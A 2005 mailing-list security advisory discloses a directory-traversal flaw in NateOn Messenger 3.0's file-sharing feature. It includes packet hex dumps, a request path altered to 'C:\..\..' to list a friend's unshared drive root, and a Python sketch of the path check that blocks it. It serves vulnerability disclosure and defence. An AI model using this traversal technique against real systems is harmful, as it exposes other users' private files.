
Dear F/D Mailing lists

Title:             NateOn Messenger Version 3.0 Directory listing vulnerability
Discoverer:        PARK, GYU TAE (saintlinu@null2root.org)
Advisory No.:      NRVA05-02
Critical:          Less critical
Impact:            Information disclosed by unauthorized user and DoS
Where:             From remote
Operating System:  Windows Only
Solution:          Patched
Workaround:        Disable fileshare function until patched by vendor

Notice:            06. 20. 2005 Initial report to vendor – No response
                   06. 23. 2005 Second report – No response
                   06. 27. 2005 Vulnerability disclosed
                   06. 29. 2005 Secunia notified; vendor responded
                   07. 0X. 2005 Patched (I don't know the exact patch date because the vendor did not inform me)


Description:

NateOn, an Internet messenger similar to MSN that is popular among Koreans in their twenties and thirties, has a vulnerability in its FileShare function.

When a user shares a folder such as 'openFolder', registered friends can access that folder. But a friend can also access unshared folders such as '%windir%', because NateOn trusts the folder path in the request even when the requesting client has modified it.

See the following details:

Target friend id is 'buddyid=??????@nate.com'
Shared folder name is 'debug'


[recv] Message - ### Socket : 1088 / Content-Length : 9190
Content :
00 20 31 20 31 39 38 0D 0A 3C 66 6F 6C 64 65 72   . 1 198..<folder
6C 69 73 74 20 6E 61 6D 65 3D 27 B3 CA B8 B8 BF   list name='.....
CD 27 20 62 75 64 64 79 69 64 3D 27 XX XX XX XX   .' buddyid='XXXX
XX XX 40 6E 61 74 65 2E 63 6F 6D 27 20 74 79 70   XX@nate.com' typ
65 3D 27 30 27 3E 3C 66 6F 6C 64 65 72 69 6E 66   e='0'><folderinf
6F 20 6E 61 6D 65 3D 27 2B 5F 2B 27 20 61 75 74   o name='+_+' aut
68 6F 72 69 74 79 3D 27 32 27 20 66 6F 6C 64 65   hority='2' folde
72 69 64 3D 27 30 27 20 66 6F 6C 64 65 72 70 61   rid='0' folderpa
74 68 3D 27 43 3A 5C 64 65 62 75 67 27 20 63 6F   th='C:\debug' co
6D 6D 65 6E 74 3D 27 2B 5F 2B 27 20 61 64 64 64   mment='+_+' addd
61 74 65 3D 27 32 30 30 35 30 35 32 36 31 37 35   ate='20050526175
32 33 37 27 3E 3C 2F 66 6F 6C 64 65 72 69 6E 66   237'></folderinf
6F 3E 3C 2F 66 6F 6C 64 65 72 6C 69 73 74 3E 00   o></folderlist>.
00 00 00 00 00 00                                 ......

----------------------------------------------------------------


We received the target user's shared folder information (folderpath='C:\debug'). But we can modify the packet the client sends, using the Win32 API CreateRemoteThread; we simply substituted '..\..' for 'debug'.


[send] Message - ### Socket : 1088 / Content-Length : 25
Content :
46 4C 52 4D 20 32 20 46 49 4C 45 5F 4C 49 53 54   FLRM 2 FILE_LIST
20 31 20 31 20 32 38 0D 0A                         1 1 28..

[send] Message - ### Socket : 1088 / Content-Length : 28
Content :
30 20 XX XX XX XX XX XX XX XX 40 6E 61 74 65 2E   0 YYYYYYYY@nate.
63 6F 6D 20 43 3A 5C 2E 2E 5C 2E 2E               com C:\..\..

----------------------------------------------------------------
You can see the response below.


[recv] Message - ### Socket : 1088 / Content-Length : 9216
Content :
00 4C 52 4D 20 31 20 46 49 4C 45 5F 4C 49 53 54   .LRM 1 FILE_LIST
20 31 20 31 20 39 38 31 0D 0A 3C 66 69 6C 65 6C    1 1 981..<filel
69 73 74 20 69 64 3D 27 XX XX XX XX XX XX 40 6E   ist id='XXXXXX@n
61 74 65 2E 63 6F 6D 27 20 61 75 74 68 3D 27 32   ate.com' auth='2
27 20 70 61 74 68 3D 27 43 3A 5C 2E 2E 5C 2E 2E   ' path='C:\..\..
27 20 66 6F 6C 64 65 72 69 64 3D 27 30 27 3E 3C   ' folderid='0'><
66 69 6C 65 20 6E 61 6D 65 3D 27 41 55 54 4F 45   file name='AUTOE
58 45 43 2E 42 41 54 27 20 73 69 7A 65 3D 27 30   XEC.BAT' size='0
27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 2D   ' date='2004-09-
31 35 20 31 36 3A 34 32 3A 30 37 27 20 69 73 66   15 16:42:07' isf
6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65   older='n'/><file
20 6E 61 6D 65 3D 27 43 4F 4E 46 49 47 2E 53 59    name='CONFIG.SY
53 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65   S' size='0' date
3D 27 32 30 30 34 2D 30 39 2D 31 35 20 31 36 3A   ='2004-09-15 16:
34 32 3A 30 37 27 20 69 73 66 6F 6C 64 65 72 3D   42:07' isfolder=
27 6E 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65 3D   'n'/><file name=
27 64 65 73 6B 74 6F 70 5F 61 75 64 69 74 2E 74   'desktop_audit.t
78 74 27 20 73 69 7A 65 3D 27 32 30 38 34 27 20   xt' size='2084'
64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 34   date='2005-05-24
20 30 30 3A 32 32 3A 32 38 27 20 69 73 66 6F 6C    00:22:28' isfol
64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20 6E   der='n'/><file n
61 6D 65 3D 27 64 6E 2E 76 62 73 27 20 73 69 7A   ame='dn.vbs' siz
65 3D 27 33 32 34 27 20 64 61 74 65 3D 27 32 30   e='324' date='20
30 34 2D 31 30 2D 32 30 20 31 38 3A 33 31 3A 33   04-10-20 18:31:3
38 27 20 69 73 66 6F 6C 64 65 72 3D 27 6E 27 2F   8' isfolder='n'/
3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 65 64 69   ><file name='edi
2E 65 78 65 27 20 73 69 7A 65 3D 27 33 32 37 36   .exe' size='3276
38 27 20 64 61 74 65 3D 27 32 30 30 34 2D 31 30   8' date='2004-10
2D 32 30 20 31 38 3A 30 37 3A 30 35 27 20 69 73   -20 18:07:05' is
66 6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C   folder='n'/><fil
65 20 6E 61 6D 65 3D 27 6D 73 30 34 2D 30 33 32   e name='ms04-032
2E 77 6D 66 27 20 73 69 7A 65 3D 27 35 37 36 27   .wmf' size='576'
20 64 61 74 65 3D 27 32 30 30 34 2D 31 30 2D 32    date='2004-10-2
30 20 31 38 3A 33 33 3A 34 31 27 20 69 73 66 6F   0 18:33:41' isfo
6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20   lder='n'/><file
6E 61 6D 65 3D 27 63 6F 6E 63 65 72 74 27 20 73   name='concert' s
69 7A 65 3D 27 30 27 20 64 61 74 65 3D 27 32 30   ize='0' date='20
30 34 2D 31 30 2D 32 30 20 31 35 3A 31 32 3A 35   04-10-20 15:12:5
37 27 20 69 73 66 6F 6C 64 65 72 3D 27 79 27 2F   7' isfolder='y'/
3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 64 65 62   ><file name='deb
75 67 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74   ug' size='0' dat
65 3D 27 32 30 30 35 2D 30 35 2D 32 33 20 31 32   e='2005-05-23 12
3A 34 38 3A 33 37 27 20 69 73 66 6F 6C 64 65 72   :48:37' isfolder
3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65   ='y'/><file name
3D 27 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20   ='Documents and
53 65 74 74 69 6E 67 73 27 20 73 69 7A 65 3D 27   Settings' size='
30 27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39   0' date='2004-09
2D 31 35 20 31 37 3A 30 39 3A 31 34 27 20 69 73   -15 17:09:14' is
66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C   folder='y'/><fil
65 20 6E 61 6D 65 3D 27 50 72 6F 67 72 61 6D 20   e name='Program
46 69 6C 65 73 27 20 73 69 7A 65 3D 27 30 27 20   Files' size='0'
64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 36   date='2005-05-26
20 30 38 3A 30 36 3A 31 31 27 20 69 73 66 6F 6C    08:06:11' isfol
64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E   der='y'/><file n
61 6D 65 3D 27 74 65 73 74 27 20 73 69 7A 65 3D   ame='test' size=
27 30 27 20 64 61 74 65 3D 27 32 30 30 35 2D 30   '0' date='2005-0
34 2D 32 30 20 31 34 3A 31 35 3A 34 39 27 20 69   4-20 14:15:49' i
73 66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69   sfolder='y'/><fi
6C 65 20 6E 61 6D 65 3D 27 57 49 4E 44 4F 57 53   le name='WINDOWS
27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65 3D   ' size='0' date=
27 32 30 30 34 2D 31 30 2D 32 30 20 31 36 3A 30   '2004-10-20 16:0
30 3A 31 37 27 20 69 73 66 6F 6C 64 65 72 3D 27   0:17' isfolder='
79 27 2F 3E 3C 2F 66 69 6C 65 6C 69 73 74 3E 00   y'/></filelist>.
00 00 00 00 00 00                                 ......

buddy id = YYYYYY@nate.com
Requested directory = 'C:\..\..'
File list of the unshared directory:


<filelist id='YYYYYY@nate.com' auth='2' path='C:\..\..' folderid='0'>
<file name='AUTOEXEC.BAT'           size='0'     date='2004-09-15 16:42:07' isfolder='n'/>
<file name='CONFIG.SYS'             size='0'     date='2004-09-15 16:42:07' isfolder='n'/>
<file name='desktop_audit.txt'      size='2084'  date='2005-05-24 00:22:28' isfolder='n'/>
<file name='dn.vbs'                 size='324'   date='2004-10-20 18:31:38' isfolder='n'/>
<file name='edi.exe'                size='32768' date='2004-10-20 18:07:05' isfolder='n'/>
<file name='ms04-032.wmf'           size='576'   date='2004-10-20 18:33:41' isfolder='n'/>
<file name='concert'                size='0'     date='2004-10-20 15:12:57' isfolder='y'/>
<file name='debug'                  size='0'     date='2005-05-23 12:48:37' isfolder='y'/>
<file name='Documents and Settings' size='0'     date='2004-09-15 17:09:14' isfolder='y'/>
<file name='Program Files'          size='0'     date='2005-05-26 08:06:11' isfolder='y'/>
<file name='test'                   size='0'     date='2005-04-20 14:15:49' isfolder='y'/>
<file name='WINDOWS'                size='0'     date='2004-10-20 16:00:17' isfolder='y'/>
</filelist>
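As an added example (not part of the original advisory and not NateOn's own code), here is the check the sharing client should have applied to a FILE_LIST request before listing a directory, modelled on the request frames captured above. The SHARED_FOLDERS table, the payload field names and the reading of the last header field as the payload length are assumptions.

```python
import ntpath
from typing import Dict, Optional

# Folders the client advertises in its <folderlist> (constructed sample, keyed
# by folderid; mirrors the 'debug' share with folderpath='C:\debug' above).
SHARED_FOLDERS: Dict[str, str] = {"0": r"C:\debug"}


def parse_file_list_request(frame: bytes) -> Dict[str, str]:
    """Split a FILE_LIST request into its fields.

    Layout as captured: header b"FLRM 2 FILE_LIST 1 1 <len>\r\n" followed
    by the payload b"<folderid> <buddyid> <path>". Treating the last header
    field as the payload length and the payload field names are assumptions.
    """
    header, sep, payload = frame.partition(b"\r\n")
    fields = header.decode("ascii").split()
    if not sep or fields[:1] != ["FLRM"] or "FILE_LIST" not in fields:
        raise ValueError("not a FILE_LIST request")
    if int(fields[-1]) != len(payload):
        raise ValueError("declared length %s != %d bytes" % (fields[-1], len(payload)))
    folderid, buddyid, path = payload.decode("ascii").split(" ", 2)
    return {"folderid": folderid, "buddyid": buddyid, "path": path}


def is_within_share(requested: str, share_root: str) -> bool:
    """True only if the canonicalised request path stays inside share_root.

    ntpath.normpath collapses '.', '..' and '/' the way Windows does, so
    'C:\\..\\..' becomes 'C:\\' and is rejected; comparing against the root
    plus a separator also rejects prefix tricks such as 'C:\\debugger'.
    """
    root = ntpath.normpath(share_root).lower().rstrip("\\")
    target = ntpath.normpath(requested).lower().rstrip("\\")
    return target == root or target.startswith(root + "\\")


def authorize_listing(frame: bytes) -> Optional[str]:
    """Return the canonical directory to list, or None if the request must be refused."""
    req = parse_file_list_request(frame)
    share_root = SHARED_FOLDERS.get(req["folderid"])
    if share_root is None or not is_within_share(req["path"], share_root):
        return None
    return ntpath.normpath(req["path"])
```

Feeding it the captured traversal request (folderid 0, path 'C:\..\..') yields None, while a request for a path under C:\debug is allowed.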

 

---------------------[cut cut]----------------------------------------------

Thanks to my Null@Root members

PS. I'm very sorry for my poor English

Cheers
